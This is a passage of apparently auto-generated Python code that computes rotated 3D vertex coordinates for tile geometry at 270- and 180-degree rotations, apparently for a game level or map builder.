y33 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (458), posy*-1*512 + (-512)), 270)[1])
z33 = level*448 + 309
x34 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (512), posy*-1*512 + (-458)), 270)[0])
y34 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (512), posy*-1*512 + (-458)), 270)[1])
z34 = level*448 + 309
x35 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (512), posy*-1*512 + (-458)), 270)[0])
y35 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (512), posy*-1*512 + (-458)), 270)[1])
z35 = level*448 + 64
x36 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (512), posy*-1*512 + (-512)), 270)[0])
y36 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (512), posy*-1*512 + (-512)), 270)[1])
z36 = level*448 + 64
x37 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (293), posy*-1*512 + (-346)), 270)[0])
y37 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (293), posy*-1*512 + (-346)), 270)[1])
z37 = level*448 + 309
x38 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (293), posy*-1*512 + (-346)), 270)[0])
y38 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (293), posy*-1*512 + (-346)), 270)[1])
z38 = level*448 + 64
x39 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (346), posy*-1*512 + (-293)), 270)[0])
y39 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (346), posy*-1*512 + (-293)), 270)[1])
z39 = level*448 + 64
x40 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (228), posy*-1*512 + (-160)), 270)[0])
y40 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (228), posy*-1*512 + (-160)), 270)[1])
z40 = level*448 + 64
x41 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (352), posy*-1*512 + (-286)), 270)[0])
y41 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (352), posy*-1*512 + (-286)), 270)[1])
z41 = level*448 + 64
x42 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (352), posy*-1*512 + (-286)), 270)[0])
y42 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (352), posy*-1*512 + (-286)), 270)[1])
z42 = level*448 + 320
x43 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (283), posy*-1*512 + (-356)), 270)[0])
y43 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (283), posy*-1*512 + (-356)), 270)[1])
z43 = level*448 + 64
x44 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (160), posy*-1*512 + (-230)), 270)[0])
y44 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (160), posy*-1*512 + (-230)), 270)[1])
z44 = level*448 + 64
x45 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (160), posy*-1*512 + (-230)), 270)[0])
y45 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (160), posy*-1*512 + (-230)), 270)[1])
z45 = level*448 + 320
x46 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (283), posy*-1*512 + (-356)), 270)[0])
y46 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (283), posy*-1*512 + (-356)), 270)[1])
z46 = level*448 + 320
x47 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (160), posy*-1*512 + (-230)), 270)[0])
y47 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (160), posy*-1*512 + (-230)), 270)[1])
z47 = level*448 + 320
x48 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (228), posy*-1*512 + (-160)), 270)[0])
y48 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (228), posy*-1*512 + (-160)), 270)[1])
z48 = level*448 + 320
x49 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (160), posy*-1*512 + (-230)), 270)[0])
y49 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (160), posy*-1*512 + (-230)), 270)[1])
z49 = level*448 + 64
x50 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (283), posy*-1*512 + (-356)), 270)[0])
y50 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (283), posy*-1*512 + (-356)), 270)[1])
z50 = level*448 + 64
x51 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (352), posy*-1*512 + (-286)), 270)[0])
y51 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (352), posy*-1*512 + (-286)), 270)[1])
z51 = level*448 + 64
x52 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (160), posy*-1*512 + (-230)), 270)[0])
y52 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (160), posy*-1*512 + (-230)), 270)[1])
z52 = level*448 + 320
x53 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (160), posy*-1*512 + (-230)), 270)[0])
y53 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (160), posy*-1*512 + (-230)), 270)[1])
z53 = level*448 + 64
x54 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (228), posy*-1*512 + (-160)), 270)[0])
y54 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (228), posy*-1*512 + (-160)), 270)[1])
z54 = level*448 + 64
x55 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (352), posy*-1*512 + (-286)), 270)[0])
y55 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (352), posy*-1*512 + (-286)), 270)[1])
z55 = level*448 + 320
x56 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (352), posy*-1*512 + (-286)), 270)[0])
y56 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (352), posy*-1*512 + (-286)), 270)[1])
z56 = level*448 + 64
x57 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (283), posy*-1*512 + (-356)), 270)[0])
y57 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (283), posy*-1*512 + (-356)), 270)[1])
z57 = level*448 + 64
x58 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (192), posy*-1*512 + (-138)), 270)[0])
y58 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (192), posy*-1*512 + (-138)), 270)[1])
z58 = level*448 + 309
x59 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (192), posy*-1*512 + (-138)), 270)[0])
y59 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (192), posy*-1*512 + (-138)), 270)[1])
z59 = level*448 + 64
x60 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (250), posy*-1*512 + (-197)), 270)[0])
y60 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (250), posy*-1*512 + (-197)), 270)[1])
z60 = level*448 + 64
x61 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (197), posy*-1*512 + (-250)), 270)[0])
y61 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (197), posy*-1*512 + (-250)), 270)[1])
z61 = level*448 + 64
x62 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (192), posy*-1*512 + (-245)), 270)[0])
y62 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (192), posy*-1*512 + (-245)), 270)[1])
z62 = level*448 + 64
x63 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (192), posy*-1*512 + (-245)), 270)[0])
y63 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (192), posy*-1*512 + (-245)), 270)[1])
z63 = level*448 + 309
x64 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (192), posy*-1*512 + (-245)), 270)[0])
y64 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (192), posy*-1*512 + (-245)), 270)[1])
z64 = level*448 + 309
x65 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (192), posy*-1*512 + (-245)), 270)[0])
y65 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (192), posy*-1*512 + (-245)), 270)[1])
z65 = level*448 + 64
x66 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (192), posy*-1*512 + (-138)), 270)[0])
y66 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (192), posy*-1*512 + (-138)), 270)[1])
z66 = level*448 + 64
x67 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (197), posy*-1*512 + (-250)), 270)[0])
y67 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (197), posy*-1*512 + (-250)), 270)[1])
z67 = level*448 + 309
x68 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (192), posy*-1*512 + (-245)), 270)[0])
y68 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (192), posy*-1*512 + (-245)), 270)[1])
z68 = level*448 + 309
x69 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (192), posy*-1*512 + (-138)), 270)[0])
y69 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (192), posy*-1*512 + (-138)), 270)[1])
z69 = level*448 + 309
x70 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (250), posy*-1*512 + (-197)), 270)[0])
y70 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (250), posy*-1*512 + (-197)), 270)[1])
z70 = level*448 + 64
x71 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (192), posy*-1*512 + (-138)), 270)[0])
y71 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (192), posy*-1*512 + (-138)), 270)[1])
z71 = level*448 + 64
x72 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (192), posy*-1*512 + (-245)), 270)[0])
y72 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (192), posy*-1*512 + (-245)), 270)[1])
z72 = level*448 + 64
x73 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (250), posy*-1*512 + (-197)), 270)[0])
y73 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (250), posy*-1*512 + (-197)), 270)[1])
z73 = level*448 + 309
x74 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (250), posy*-1*512 + (-197)), 270)[0])
y74 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (250), posy*-1*512 + (-197)), 270)[1])
z74 = level*448 + 64
x75 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (197), posy*-1*512 + (-250)), 270)[0])
y75 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (197), posy*-1*512 + (-250)), 270)[1])
z75 = level*448 + 64
x76 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (192), posy*-1*512 + (-245)), 270)[0])
y76 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (192), posy*-1*512 + (-245)), 270)[1])
z76 = level*448 + 309
x77 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (192), posy*-1*512 + (-245)), 270)[0])
y77 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (192), posy*-1*512 + (-245)), 270)[1])
z77 = level*448 + 64
x78 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (138), posy*-1*512 + (-192)), 270)[0])
y78 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (138), posy*-1*512 + (-192)), 270)[1])
z78 = level*448 + 64
x79 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (192), posy*-1*512 + (-192)), 270)[0])
y79 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (192), posy*-1*512 + (-192)), 270)[1])
z79 = level*448 + 64
x80 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (192), posy*-1*512 + (-245)), 270)[0])
y80 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (192), posy*-1*512 + (-245)), 270)[1])
z80 = level*448 + 64
x81 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (192), posy*-1*512 + (-245)), 270)[0])
y81 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (192), posy*-1*512 + (-245)), 270)[1])
z81 = level*448 + 309
x82 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (192), posy*-1*512 + (-245)), 270)[0])
y82 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (192), posy*-1*512 + (-245)), 270)[1])
z82 = level*448 + 309
x83 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (138), posy*-1*512 + (-192)), 270)[0])
y83 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (138), posy*-1*512 + (-192)), 270)[1])
z83 = level*448 + 309
x84 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (192), posy*-1*512 + (-192)), 270)[0])
y84 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (192), posy*-1*512 + (-192)), 270)[1])
z84 = level*448 + 309
x85 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (138), posy*-1*512 + (-192)), 270)[0])
y85 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (138), posy*-1*512 + (-192)), 270)[1])
z85 = level*448 + 64
x86 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (192), posy*-1*512 + (-245)), 270)[0])
y86 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (192), posy*-1*512 + (-245)), 270)[1])
z86 = level*448 + 64
x87 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (192), posy*-1*512 + (-192)), 270)[0])
y87 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (192), posy*-1*512 + (-192)), 270)[1])
z87 = level*448 + 64
x88 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (138), posy*-1*512 + (-192)), 270)[0])
y88 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (138), posy*-1*512 + (-192)), 270)[1])
z88 = level*448 + 309
x89 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (138), posy*-1*512 + (-192)), 270)[0])
y89 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (138), posy*-1*512 + (-192)), 270)[1])
z89 = level*448 + 64
x90 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (192), posy*-1*512 + (-192)), 270)[0])
y90 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (192), posy*-1*512 + (-192)), 270)[1])
z90 = level*448 + 64
x91 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (128), posy*-1*512 + (-74)), 270)[0])
y91 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (128), posy*-1*512 + (-74)), 270)[1])
z91 = level*448 + 64
x92 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (192), posy*-1*512 + (-138)), 270)[0])
y92 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (192), posy*-1*512 + (-138)), 270)[1])
z92 = level*448 + 64
x93 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (192), posy*-1*512 + (-138)), 270)[0])
y93 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (192), posy*-1*512 + (-138)), 270)[1])
z93 = level*448 + 309
x94 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (138), posy*-1*512 + (-192)), 270)[0])
y94 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (138), posy*-1*512 + (-192)), 270)[1])
z94 = level*448 + 309
x95 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (138), posy*-1*512 + (-192)), 270)[0])
y95 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (138), posy*-1*512 + (-192)), 270)[1])
z95 = level*448 + 64
x96 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (128), posy*-1*512 + (-181)), 270)[0])
y96 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (128), posy*-1*512 + (-181)), 270)[1])
z96 = level*448 + 64
x97 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (192), posy*-1*512 + (-138)), 270)[0])
y97 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (192), posy*-1*512 + (-138)), 270)[1])
z97 = level*448 + 309
x98 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (192), posy*-1*512 + (-138)), 270)[0])
y98 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (192), posy*-1*512 + (-138)), 270)[1])
z98 = level*448 + 64
x99 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (192), posy*-1*512 + (-192)), 270)[0])
y99 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (192), posy*-1*512 + (-192)), 270)[1])
z99 = level*448 + 64
x100 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (192), posy*-1*512 + (-192)), 270)[0])
y100 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (192), posy*-1*512 + (-192)), 270)[1])
z100 = level*448 + 309
x101 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (192), posy*-1*512 + (-192)), 270)[0])
y101 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (192), posy*-1*512 + (-192)), 270)[1])
z101 = level*448 + 64
x102 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (138), posy*-1*512 + (-192)), 270)[0])
y102 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (138), posy*-1*512 + (-192)), 270)[1])
z102 = level*448 + 64
x103 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (138), posy*-1*512 + (-192)), 270)[0])
y103 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (138), posy*-1*512 + (-192)), 270)[1])
z103 = level*448 + 309
x104 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (128), posy*-1*512 + (-181)), 270)[0])
y104 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (128), posy*-1*512 + (-181)), 270)[1])
z104 = level*448 + 309
x105 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (128), posy*-1*512 + (-74)), 270)[0])
y105 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (128), posy*-1*512 + (-74)), 270)[1])
z105 = level*448 + 309
x106 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (192), posy*-1*512 + (-138)), 270)[0])
y106 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (192), posy*-1*512 + (-138)), 270)[1])
z106 = level*448 + 64
x107 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (128), posy*-1*512 + (-74)), 270)[0])
y107 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (128), posy*-1*512 + (-74)), 270)[1])
z107 = level*448 + 64
x108 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (128), posy*-1*512 + (-181)), 270)[0])
y108 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (128), posy*-1*512 + (-181)), 270)[1])
z108 = level*448 + 64
x109 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (128), posy*-1*512 + (-181)), 270)[0])
y109 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (128), posy*-1*512 + (-181)), 270)[1])
z109 = level*448 + 309
x110 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (128), posy*-1*512 + (-181)), 270)[0])
y110 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (128), posy*-1*512 + (-181)), 270)[1])
z110 = level*448 + 64
x111 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (128), posy*-1*512 + (-74)), 270)[0])
y111 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (128), posy*-1*512 + (-74)), 270)[1])
z111 = level*448 + 64
x112 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (53), posy*-1*512), 270)[0])
y112 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (53), posy*-1*512), 270)[1])
z112 = level*448 + 64
x113 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (128), posy*-1*512 + (-74)), 270)[0])
y113 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (128), posy*-1*512 + (-74)), 270)[1])
z113 = level*448 + 64
x114 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (128), posy*-1*512 + (-74)), 270)[0])
y114 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (128), posy*-1*512 + (-74)), 270)[1])
z114 = level*448 + 309
x115 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (128), posy*-1*512 + (-181)), 270)[0])
y115 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (128), posy*-1*512 + (-181)), 270)[1])
z115 = level*448 + 64
x116 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512, posy*-1*512 + (-53)), 270)[0])
y116 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512, posy*-1*512 + (-53)), 270)[1])
z116 = level*448 + 64
x117 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512, posy*-1*512 + (-53)), 270)[0])
y117 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512, posy*-1*512 + (-53)), 270)[1])
z117 = level*448 + 309
x118 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512, posy*-1*512 + (-53)), 270)[0])
y118 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512, posy*-1*512 + (-53)), 270)[1])
z118 = level*448 + 309
x119 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512, posy*-1*512 + (-53)), 270)[0])
y119 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512, posy*-1*512 + (-53)), 270)[1])
z119 = level*448 + 64
x120 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512, posy*-1*512), 270)[0])
y120 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512, posy*-1*512), 270)[1])
z120 = level*448 + 64
x121 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (128), posy*-1*512 + (-181)), 270)[0])
y121 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (128), posy*-1*512 + (-181)), 270)[1])
z121 = level*448 + 309
x122 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512, posy*-1*512 + (-53)), 270)[0])
y122 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512, posy*-1*512 + (-53)), 270)[1])
z122 = level*448 + 309
x123 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512, posy*-1*512), 270)[0])
y123 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512, posy*-1*512), 270)[1])
z123 = level*448 + 309
x124 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (128), posy*-1*512 + (-74)), 270)[0])
y124 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (128), posy*-1*512 + (-74)), 270)[1])
z124 = level*448 + 64
x125 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (53), posy*-1*512), 270)[0])
y125 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (53), posy*-1*512), 270)[1])
z125 = level*448 + 64
x126 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512, posy*-1*512), 270)[0])
y126 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512, posy*-1*512), 270)[1])
z126 = level*448 + 64
x127 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (128), posy*-1*512 + (-74)), 270)[0])
y127 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (128), posy*-1*512 + (-74)), 270)[1])
z127 = level*448 + 309
x128 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (128), posy*-1*512 + (-74)), 270)[0])
y128 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (128), posy*-1*512 + (-74)), 270)[1])
z128 = level*448 + 64
x129 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (128), posy*-1*512 + (-181)), 270)[0])
y129 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (128), posy*-1*512 + (-181)), 270)[1])
z129 = level*448 + 64
x130 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512, posy*-1*512), 270)[0])
y130 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512, posy*-1*512), 270)[1])
z130 = level*448 + 309
x131 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512, posy*-1*512), 270)[0])
y131 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512, posy*-1*512), 270)[1])
z131 = level*448 + 64
x132 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (53), posy*-1*512), 270)[0])
y132 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (53), posy*-1*512), 270)[1])
z132 = level*448 + 64
#INSERT_ROT_1_PY_LIST
elif rotation == 2:
x1 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512, posy*-1*512), 180)[0])
y1 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512, posy*-1*512), 180)[1])
z1 = level*448 + 64
x2 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (512), posy*-1*512), 180)[0])
y2 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (512), posy*-1*512), 180)[1])
z2 = level*448 + 64
x3 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (512), posy*-1*512 + (-512)), 180)[0])
y3 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (512), posy*-1*512 + (-512)), 180)[1])
z3 = level*448 + 64
x4 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512, posy*-1*512 + (-512)), 180)[0])
y4 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512, posy*-1*512 + (-512)), 180)[1])
z4 = level*448 + 0
x5 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (512), posy*-1*512 + (-512)), 180)[0])
y5 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (512), posy*-1*512 + (-512)), 180)[1])
z5 = level*448 + 0
x6 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (512), posy*-1*512), 180)[0])
y6 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (512), posy*-1*512), 180)[1])
z6 = level*448 + 0
x7 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512, posy*-1*512), 180)[0])
y7 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512, posy*-1*512), 180)[1])
z7 = level*448 + 64
x8 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512, posy*-1*512 + (-512)), 180)[0])
y8 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512, posy*-1*512 + (-512)), 180)[1])
z8 = level*448 + 64
x9 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512, posy*-1*512 + (-512)), 180)[0])
y9 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512, posy*-1*512 + (-512)), 180)[1])
z9 = level*448 + 0
x10 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (512), posy*-1*512), 180)[0])
y10 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (512), posy*-1*512), 180)[1])
z10 = level*448 + 0
x11 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (512), posy*-1*512 + (-512)), 180)[0])
y11 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (512), posy*-1*512 + (-512)), 180)[1])
